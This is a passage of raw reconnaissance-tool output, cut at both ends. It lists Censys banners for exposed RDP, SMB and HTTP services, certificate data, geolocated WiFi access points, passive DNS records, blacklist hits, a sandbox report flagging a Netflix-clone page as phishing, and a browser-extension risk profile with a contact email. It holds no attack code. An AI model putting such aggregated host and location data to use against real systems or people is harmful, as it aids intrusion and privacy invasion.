"transport_fingerprint": {"raw": "65535,128,true,MNWNNS,1460,false,false", "os": "Windows *", "id": 429}, "banner": "SMB SMB 2.1", "port": 445, "software": [{"vendor": "microsoft", "product": "windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "source": "OSI_TRANSPORT_LAYER"}]}, {"tls": {"server_key_exchange": {"ec_params": {"named_curve": 24}}, "_encoding": {"ja3s": "DISPLAY_HEX"}, "version_selected": "TLSv1_2", "cipher_selected": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "certificates": {"_encoding": {"leaf_fp_sha_256": "DISPLAY_HEX"}, "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "ruG0HFgv/8OXJWtxPCjUSQ85xDh2SJLByLm11c5cyZyMwJU/sWedNfO9DrevuT8F7VTYR5X9Jn9+NDXdfpZEQNy6zH+rYAiGSV94DzEOv8TqWPEo6TIzWBaS72PEIlTdq7nRnq7wO229GGWbClkbdw9qb1Ul/qbRHM7TT3kh7/gVKezZbTafnBnRnSghbqP3Z+9EoHVAitQl4NFBxkS94wX+pi5FPNe/dGPxT8v8SrvPl+DxkvgcVomdT3Gt7JTvfgjSWY2hJ5+d9dHNrgV4NShiaSBkDhIw3H44DQxJJGeOiPvGGMCLbHZIhhcbpYiP+//lXbcmsSe7v8Dij7/WiQ==", "exponent": "AAEAAQ=="}, "fingerprint": "46f940f431befbf3e8c0d41e66defd7ca5752176463e410bf7ff1a076f677750"}, "subject_dn": "CN=70724-04381.pph-server.de", "pubkey_bit_size": 2048, "fingerprint": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "issuer_dn": "CN=70724-04381.pph-server.de", "names": ["70724-04381.pph-server.de"], "tbs_fingerprint": "103620f100eb7ba4c99aca138e14895b8d66946b6c6a90ced8fa2de351716b31", "subject": {"common_name": ["70724-04381.pph-server.de"]}, "signature": {"self_signed": true, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["70724-04381.pph-server.de"]}}, "leaf_fp_sha_256": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc"}, "ja3s": "364ff14b04ef93c3b4cfa429d729c0d9"}, "_encoding": {"certificate": "DISPLAY_HEX"}, "_decoded": "rdp", "jarm": {"_encoding": 
{"cipher_and_version_fingerprint": "DISPLAY_HEX", "tls_extensions_sha256": "DISPLAY_HEX", "fingerprint": "DISPLAY_HEX"}, "cipher_and_version_fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2ad", "tls_extensions_sha256": "fd9c9d14e4f4f67f94f0359f8b28f532", "observed_at": "2023-04-25T19:43:40.097167804Z", "fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532"}, "rdp": {"selected_security_protocol": {"tls": true, "raw_value": 1, "rdstls": false, "error_hybrid_required": false, "credssp_early_auth": false, "error_bad_flags": false, "error_ssl_forbidden": false, "error_ssl_cert_missing": false, "credssp": false, "error_ssl_user_auth_required": false, "error": false, "error_ssl_required": false, "standard_rdp": true, "error_unknown": false}, "protocol_flags": {"dynvc_graphics_pipeline": true, "neg_resp_reserved": true, "restricted_auth_mode": true, "restricted_admin_mode": true, "extended_client_data_supported": true}, "connect_response": {"connect_id": 0, "domain_parameters": {"max_mcspdu_size": 65528, "num_priorities": 1, "max_user_id_channels": 3, "domain_protocol_version": 2, "max_token_ids": 0, "max_provider_height": 1, "max_channel_ids": 34, "min_throughput": 0}}, "version": {"raw": 524299, "major": 10, "minor": 6}, "certificate_info": {}, "x224_cc_pdu_srcref": 13330}, "certificate": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "truncated": false, "service_name": "RDP", "labels": ["remote-access", "network-administration"], "source_ip": "167.94.146.58", "extended_service_name": "RDP", "observed_at": "2023-05-11T13:18:54.374691218Z", "perspective_id": "PERSPECTIVE_TELIA", "transport_protocol": "TCP", "port": 3389, "transport_fingerprint": {"raw": "64000,128,true,MNWNNS,1460,false,false"}}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 
(compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://45.131.109.53:5985/"}, "response": {"body": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Not Found</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Not Found</h2>\r\n<hr><p>HTTP Error 404. The requested resource is not found.</p>\r\n</BODY></HTML>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Not Found", "protocol": "HTTP/1.1", "body_size": 315, "body_hashes": ["sha256:ce7127c38e30e92a021ed2bd09287713c6a923db9ffdb43f126e8965d777fbf0", "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083"], "status_code": 404, "body_hash": "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083", "headers": {"Content_Length": ["315"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]}, "html_tags": ["<TITLE>Not Found</TITLE>", "<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\">"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:d7de42c1e8c09cf951e3ad6248fda3ab48a60ca3eac8b25effd4b3067df8f362"], "source_ip": "162.142.125.216", "extended_service_name": "HTTP", "observed_at": "2023-05-12T01:02:37.678343941Z", "banner_hex": 
"485454502f312e3120343034204e6f7420466f756e640d0a436f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d75732d61736369690d0a5365727665723a204d6963726f736f66742d485454504150492f322e300d0a446174653a20203c52454441435445443e0d0a436f6e6e656374696f6e3a20636c6f73650d0a436f6e74656e742d4c656e6774683a203331350d0a", "perspective_id": "PERSPECTIVE_HE", "banner": "HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=us-ascii\r\nServer: Microsoft-HTTPAPI/2.0\r\nDate: <REDACTED>\r\nConnection: close\r\nContent-Length: 315\r\n", "port": 5985, "software": [{"product": "Windows", "vendor": "Microsoft", "source": "OSI_APPLICATION_LAYER", "p | 45.131.109.53 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-7734 (Net ID: 38:70:0C:07:77:32) | 37.751, -97.822 |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.27): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 51 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:23 | Web Content Type | No | Web Spider | 0 | 0 | 5 | 0 | None | text/html;charset=utf-8 | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT9D2Yjw8 (Net ID: E0:22:03:E8:DB:5A) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6566 0615 (Net ID: 00:00:C5:D7:61:48) | 41.8781, -87.6298 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: webmailsession=%3aJ6wQNgi5mDSbd8Aj%2ccc122e301037955ff583c00e21431728; HttpOnly; path=/; port=2096; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2096; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2096
Set-Cookie: roundcube_cookies=enabled; HttpOnly; expires=Thu, 09-May-2024 16:40:03 GMT; path=/; port=2096; secure
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12483
| 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:01:E6:93:CF:EC) | 37.780462,-122.390564 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.110.153 | battleb0t.xyz |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00tau.github.io |
| 2023-05-12 02:51:01 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kangbinkwon.github.io/kangbinkwon-Netflix_clonecoding/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_6d4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"\n "IsoScope_6d4_IE_EarlyTabStart_0xdf8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6d4_ConnHashTable<1748>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6d4_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.108.153:443"\n "104.18.22.52:443"\n "69.16.175.10:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "code.jquery.com"\n "kangbinkwon.github.io"\n "pro.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a class="authLinks lang" href="https://www.netflix.com/kr/login"></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<form class="cta-form" action="https://www.netflix.com/signup/registration?locale=ko-KR">" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<span class="lang"> . 
PC netflix.com ," (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/node/412" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/login?nextpage=https%3A%2F%2Fwww.netflix.com%2Fyouraccount"" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://media.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://jobs.netflix.com/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://devices.netflix.com/ko/" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/termsofuse" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/privacy" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/corpinfo" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/contactus" 
class="footer-link"><span class="lang"></span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/notices" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/browse/genre/839338" class="footer-link"><span class="lang">Netflix" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<div class="copy-text-block lang"> : korea@netflix.com</div>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced" and extension 
"png"\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "card-02-tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 
1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001748]\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "kangbinkwon-Netflix_clonecoding_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001748]\n "nficon2016_1_.ico" has type "MS Windows icon resource - 1 icon 64x64 32 bits/pixel"- [targetUID: N/A]\n "~DFF6F278D010A12D33.TMP" has type "data"- Location: [%TEMP%\\~DFF6F278D010A12D33.TMP]- [targetUID: 00000000-00001748]\n "~DF048C015CE4B792F4.TMP" has type "data"- Location: [%TEMP%\\~DF048C015CE4B792F4.TMP]- [targetUID: 00000000-00001748]\n "~DF0EACE11BF | 185.199.108.153 |
| 2023-05-12 02:45:41 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco (South Beach)', u'security': {u'is_vpn': False}, u'city_geoname_id': 5326621, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -118.244, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:40'}, u'latitude': 34.0544, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.110.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.110.153 |
| 2023-05-12 02:46:39 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.110.153] | 185.199.110.153 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5a3af72b618723-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EE:43:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Lord Voldmodem (Net ID: F8:F5:32:63:56:0E) | 37.751, -97.822 |
| 2023-05-12 02:57:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
ff:0e:1e:a4:6f:55:f0:74:0e:b3:83:e1:07:c9:ea:93
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Dec 14 04:12:07 2022 GMT
Not After : Mar 14 04:12:06 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c0:3f:15:01:81:40:92:70:87:14:2c:25:01:e5:
a7:7f:11:ff:2d:2c:1c:6c:21:42:67:4e:30:48:bf:
c1:33:05:3f:32:e6:9d:27:08:a8:f7:db:7e:1a:19:
1c:aa:99:e8:d8:96:24:37:12:c6:a7:26:93:c0:67:
f6:d7:bf:fc:b8:23:1f:07:9c:8a:3a:8e:50:72:7a:
0b:43:ee:28:4c:e1:d7:7b:d8:4b:14:51:0a:cf:12:
03:a0:03:83:38:8b:68:c0:ba:0b:40:43:da:e2:c7:
fd:15:ad:f1:8a:ab:ad:d4:e1:28:d8:1f:91:4f:47:
05:38:6f:51:ba:b9:1e:e4:8f:9a:e9:d0:3a:3f:ae:
54:23:1b:cb:47:92:67:43:7b:78:2f:12:0d:48:e5:
86:54:03:05:53:71:94:6f:99:ca:50:b2:16:e3:59:
28:bd:e6:69:65:a7:0a:f0:76:9d:7c:ae:23:47:a4:
a0:54:01:4b:e1:a1:6c:56:66:e9:5f:20:b4:97:88:
6b:ae:96:63:a2:7f:14:d1:e7:4b:38:62:1b:57:9e:
5f:19:6f:4a:f8:f3:3f:ef:b1:e8:e9:b2:bb:cb:cb:
97:cd:3c:47:76:5d:e9:c6:1b:37:bc:84:42:29:b5:
65:be:97:34:7e:ff:74:79:85:f4:78:a1:2a:b1:60:
7b:21
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FA:7E:08:50:07:6C:FD:DC:A8:68:45:A3:97:1C:E4:28:15:A8:2F:9D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/Yj_rNAxE9pQ
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/ihFiAY-64YY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
45:c0:ed:fe:c5:44:0c:96:51:92:15:dc:2f:1d:e5:5e:4c:7f:
89:4a:3f:3d:94:64:76:5e:6b:ff:8c:03:7f:eb:ae:61:c0:89:
16:34:3c:a1:d5:87:98:35:53:48:52:1e:b4:61:d3:7d:9f:96:
bd:0f:71:c5:cf:b6:14:12:8a:01:59:97:dc:9b:84:b8:dd:00:
79:7f:7b:33:b7:24:69:1f:af:bd:66:ab:a1:a1:aa:55:6d:07:
62:b3:82:ac:fd:d6:53:44:01:3b:7c:3d:b9:8c:0c:8a:49:6d:
d5:e2:69:ce:ba:89:85:d0:a0:a7:81:a9:33:e3:76:b1:ed:fb:
71:7d:21:ea:82:98:93:f2:93:44:03:80:07:95:04:86:b6:71:
7f:1b:b4:73:ab:10:06:9e:6f:7b:f8:37:23:5b:20:c2:b0:1b:
8c:a9:f0:bb:c8:15:54:65:03:66:2b:65:2b:dd:c8:82:36:7d:
72:f9:d2:d6:5a:4a:b5:ef:a1:6b:50:f2:a1:c4:4a:6e:36:35:
c1:77:e5:2a:d0:28:89:59:f4:ec:d9:e0:96:66:a5:63:34:40:
69:7a:2a:6c:50:eb:81:e2:8a:ed:dd:bc:84:68:33:dd:56:7f:
0b:5f:af:bd:a2:2e:a4:1d:b3:12:b6:18:66:80:38:3d:ab:75:
96:5c:c6:6f
| ayhu.xyz |
| 2023-05-12 03:10:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.153:80 | 185.199.108.0/24 |
| 2023-05-12 02:59:49 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | replayhubunlimited@gmail.com | [{"platform": "Chrome", "version": "1.0", "data": {"dangerousfunctions": {".insertBefore(": {"/tmp/agjliddikiapkkpacaacecphgdoplfop_1.0/content.js": [26]}}, "webstore": {"website": "https://replayhub.netlify.app/", "rating": 0, "privacy_policy": "", "last_updated": "2023-04-06", "name": "ReplayHub YouTube Looper", "price": "", "offered_by": "", "support_site": "https://replayhub.netlify.app/", "version": "", "address": "", "short_description": "A Chrome extension for looping YouTube videos.", "permission_warnings": [], "users": 2, "size": "12.84KiB", "type": "Extension", "email": "replayhubunlimited@gmail.com", "rating_users": 0, "icon": "https://lh3.googleusercontent.com/8hLe0teq-FvENQnMGTH5hbKoAgfgd5YttifZdgjiDupvDj0k9qP7enO7qNry3CWBXmZtrms-qMTbQk7rL--uibGNuA=w128-h128-e365-rj-sc0x00ffffff"}, "risk": {"metadata": {}, "total": 382, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "webstore": {"privacy_policy": 1, "last_updated": 1, "users": 1, "address": 1, "total": 5, "rating_users": 1}}, "related": {"iginnfkhmmfhlkagcmpgofnjhanpmklb": {"rating": 4.602212, "users": 1000000, "platform": "", "short_description": "Play over 50 levels of box-jumping madness! Design and share your own levels.", "icon": 